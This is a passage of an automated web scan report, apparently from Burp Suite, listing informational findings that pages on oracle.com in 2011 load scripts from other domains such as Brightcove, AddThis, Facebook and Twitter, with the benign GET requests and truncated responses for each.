User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41182210587165352,0:1)
Date: Tue, 06 Sep 2011 16:16:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.273. http://www.oracle.com/us/products/financing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/financing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/financing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36010644761040741,0:1)
Date: Tue, 06 Sep 2011 16:16:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.274. http://www.oracle.com/us/products/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=206;ecid=41100185301745926,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/mobilecompatibility.js" type="text/javascript">
</script>
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.275. http://www.oracle.com/us/products/middleware/exalogic/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/middleware/exalogic/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/middleware/exalogic/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41167156726795434,0:1)
Date: Tue, 06 Sep 2011 16:16:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 148017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.276. http://www.oracle.com/us/products/middleware/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/middleware/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/middleware/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41182305076447159,0:1)
Date: Tue, 06 Sep 2011 16:16:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 159756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.277. http://www.oracle.com/us/products/ondemand/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/ondemand/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/ondemand/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41100704992796393,0:1)
Date: Tue, 06 Sep 2011 16:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.278. http://www.oracle.com/us/products/productslist/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/productslist/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/productslist/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=11;ecid=41167500324184736,0:1)
Date: Tue, 06 Sep 2011 16:16:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 306727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</table>
<script language="javascript" src="http://ethnio.com/remotes/93611" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.279. http://www.oracle.com/us/products/servers-storage/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/servers-storage/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/servers-storage/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=8;ecid=35997313182343520,0:1)
Date: Tue, 06 Sep 2011 16:16:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 150851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.280. http://www.oracle.com/us/products/servers-storage/solaris/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/servers-storage/solaris/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/servers-storage/solaris/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36009571019199159,0:1)
Date: Tue, 06 Sep 2011 16:16:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 146507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.281. http://www.oracle.com/us/products/tools/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/tools/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41100606208547255,0:1)
Date: Tue, 06 Sep 2011 16:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 151414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.282. http://www.oracle.com/us/social-media/facebook/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/social-media/facebook/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/social-media/facebook/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41101572576206911,0:1)
Date: Tue, 06 Sep 2011 16:16:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="faceBookLikeBt"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.283. http://www.oracle.com/us/social-media/linkedin/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/social-media/linkedin/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/social-media/linkedin/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168475281778550,0:1)
Date: Tue, 06 Sep 2011 16:16:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="faceBookLikeBt"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.284. http://www.oracle.com/us/social-media/twitter/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/social-media/twitter/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/social-media/twitter/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168393677398942,0:1)
Date: Tue, 06 Sep 2011 16:16:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="faceBookLikeBt"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div--> <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.285. http://www.oracle.com/us/solutions/corporate-governance/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/corporate-governance/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/solutions/corporate-governance/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=208;ecid=41168861828840303,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 161084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.286. http://www.oracle.com/us/solutions/datawarehousing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/datawarehousing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/solutions/datawarehousing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35744124860188436,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.287. http://www.oracle.com/us/solutions/ent-performance-bi/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/ent-performance-bi/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/solutions/ent-performance-bi/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41120169783617619,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.288. http://www.oracle.com/us/solutions/midsize/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/midsize/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/solutions/midsize/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41183804020059007,0:1)
Date: Tue, 06 Sep 2011 16:16:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 141597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.289. http://www.oracle.com/us/solutions/performance-scalability/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/performance-scalability/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/solutions/performance-scalability/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011151567188407,0:1)
Date: Tue, 06 Sep 2011 16:16:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.290. http://www.oracle.com/us/solutions/solutions-165852.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/solutions-165852.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/solutions/solutions-165852.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=36011228876600791,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/mobilecompatibility.js" type="text/javascript">
</script>
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.291. http://www.oracle.com/us/sun/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/sun/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/sun/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=242;ecid=35989165629261333,0:1)
Date: Tue, 06 Sep 2011 16:16:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.292. http://www.oracle.com/us/support/advanced-customer-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/advanced-customer-services/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/advanced-customer-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41102401504905518,0:1)
Date: Tue, 06 Sep 2011 16:16:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
